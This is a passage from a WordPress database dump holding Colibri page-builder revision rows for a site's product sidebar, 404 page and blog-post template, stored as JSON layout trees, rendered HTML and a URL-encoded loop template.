"name\":\"hop-categories-widget\",\"id\":\"46-s10\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":189,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"46-s11\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":190,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"46-s12\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":191,\"type\":\"sidebar\"}],\"styleRef\":184,\"type\":\"sidebar\"}],\"styleRef\":183,\"type\":\"sidebar\"}],\"id\":\"46-s3\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":182,\"type\":\"sidebar\"}],\"parentId\":\"46-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\" Woo Sidebar\",\"attrs\":{\"id\":\"product-sidebar\"}},\"id\":\"46-s2\",\"partialId\":46,\"styleRef\":177}]}','','','inherit','closed','closed','','47-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',47,'https://gsudice.dataconn.net/?p=51',0,'revision','',0),(52,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>','sidebar_product','','inherit','closed','closed','','46-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',46,'https://gsudice.dataconn.net/?p=52',0,'revision','',0),(59,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":0,\"id\":\"37-m4\",\"partialId\":37,\"styleRef\":134,\"type\":\"main\",\"props\":{\"content\":\"404\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":1,\"id\":\"37-m5\",\"partialId\":37,\"styleRef\":135,\"type\":\"main\",\"props\":{\"content\":\"<p>Sorry, page not found!<\\/p>\"}},{\"name\":\"hop-home-button-group\",\"children\":[{\"name\":\"hop-home-button\",\"props\":{\"text\":\"Go to Homepage!\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"37-m7\",\"parentId\":\"37-m6\",\"partialId\":37,\"styleRef\":137,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"37-m3\",\"index\":2,\"id\":\"37-m6\",\"partialId\":37,\"styleRef\":136,\"type\":\"main\"}],\"id\":\"37-m3\",\"parentId\":\"37-m2\",\"partialId\":37,\"styleRef\":133,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}}],\"id\":\"37-m2\",\"parentId\":\"37-m1\",\"partialId\":37,\"styleRef\":132,\"type\":\"main\",\"props\":{\"name\":\"Nothing found\",\"attrs\":{\"id\":\"nothing-found\"}}}],\"id\":\"37-m1\",\"partialId\":37,\"styleRef\":131,\"type\":\"main\"}','','','inherit','closed','closed','','38-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',38,'https://gsudice.dataconn.net/?p=59',0,'revision','',0),(60,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n <!---->\n <!---->\n <h2 class=\"\">404</h2>\n </div>\n <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Sorry, page not found!</p>\n </div>\n </div>\n <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\" data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span> <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',37,'https://gsudice.dataconn.net/?p=60',0,'revision','',0),(61,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m27\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":70,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m28\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":71,\"type\":\"main\"}],\"id\":\"31-m26\",\"parentId\":\"31-m25\",\"partialId\":31,\"styleRef\":69,\"type\":\"main\"}],\"id\":\"31-m25\",\"parentId\":\"31-m2\",\"partialId\":31,\"styleRef\":68,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-post-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"id\":\"31-m5\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":74,\"type\":\"main\",\"props\":{\"showPlaceholder\":false,\"addLink\":false}},{\"name\":\"hop-row\",\"id\":\"31-m6\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":75,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"id\":\"31-m7\",\"parentId\":\"31-m6\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-meta\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m8\",\"partialId\":31,\"styleRef\":77,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"\"}},{\"name\":\"hop-post-content\",\"parentId\":\"31-m7\",\"id\":\"31-m9\",\"partialId\":31,\"styleRef\":78,\"type\":\"main\"},{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m11\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m11\",\"index\":0,\"id\":\"31-m12\",\"partialId\":31,\"styleRef\":81,\"type\":\"main\",\"props\":{\"content\":\"<p>Categories:<\\/p>\"}}],\"styleRef\":80,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m13\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"31-m13\",\"index\":0,\"id\":\"31-m14\",\"partialId\":31,\"styleRef\":83,\"type\":\"main\"}],\"styleRef\":82,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m10\",\"partialId\":31,\"styleRef\":79,\"type\":\"main\"},{\"name\":\"hop-post-tags-container\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m15\",\"partialId\":31,\"styleRef\":84,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m16\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m16\",\"index\":0,\"id\":\"31-m17\",\"partialId\":31,\"styleRef\":86,\"type\":\"main\",\"props\":{\"content\":\"<p>Tags:<\\/p>\"}}],\"styleRef\":85,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m18\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-tags\",\"slot\":null,\"parentId\":\"31-m18\",\"index\":2,\"id\":\"31-m19\",\"partialId\":31,\"styleRef\":88,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":87,\"type\":\"main\"}]}],\"styleRef\":76,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}}}],\"slot\":null,\"index\":1},{\"name\":\"hop-post-nav-container\",\"parentId\":\"31-m4\",\"id\":\"31-m20\",\"partialId\":31,\"styleRef\":89,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m21\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m21\",\"index\":0,\"id\":\"31-m22\",\"partialId\":31,\"styleRef\":91,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"showPostTitle\":false,\"prevLabel\":\"Previous post\",\"postTitleLength\":\"40\",\"stateType\":\"\"}}],\"styleRef\":90,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m23\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m23\",\"index\":0,\"id\":\"31-m24\",\"partialId\":31,\"styleRef\":93,\"type\":\"main\",\"props\":{\"nextLabel\":\"Next post\",\"showPostTitle\":false,\"stateType\":\"\"}}],\"styleRef\":92,\"type\":\"main\"}],\"slot\":null,\"index\":2}],\"id\":\"31-m4\",\"parentId\":\"31-m3\",\"partialId\":31,\"styleRef\":73,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"31-m2\",\"index\":0,\"id\":\"31-m3\",\"partialId\":31,\"styleRef\":72,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Post\",\"attrs\":{\"id\":\"blog-post\"}},\"id\":\"31-m2\",\"partialId\":31,\"styleRef\":67},{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m36\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":97,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m37\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":98,\"type\":\"main\"}],\"id\":\"31-m35\",\"parentId\":\"31-m34\",\"partialId\":31,\"styleRef\":96,\"type\":\"main\"}],\"id\":\"31-m34\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":95,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"31-m31\",\"parentId\":\"31-m30\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-comments\",\"slot\":null,\"parentId\":\"31-m31\",\"index\":0,\"id\":\"31-m32\",\"partialId\":31,\"styleRef\":101,\"type\":\"main\",\"props\":{\"multipleTitle\":\"{COMMENTS-COUNT} Responses\",\"avatarSize\":30,\"noneTitle\":\"No responses yet\"}},{\"name\":\"hop-post-comment-form\",\"id\":\"31-m33\",\"parentId\":\"31-m31\",\"partialId\":31,\"styleRef\":102,\"type\":\"main\"}],\"styleRef\":100,\"type\":\"main\"}],\"id\":\"31-m30\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":99,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Comments\",\"attrs\":{\"id\":\"comments\"}},\"id\":\"31-m29\",\"partialId\":31,\"styleRef\":94}],\"id\":\"31-m1\",\"partialId\":31,\"styleRef\":66,\"type\":\"main\"}','','','inherit','closed','closed','','32-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',32,'https://gsudice.dataconn.net/?p=61',0,'revision','',0),(62,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22432-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22432-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20colibri-post-thumbnail-has-placeholder%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%20colibri-post-content%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!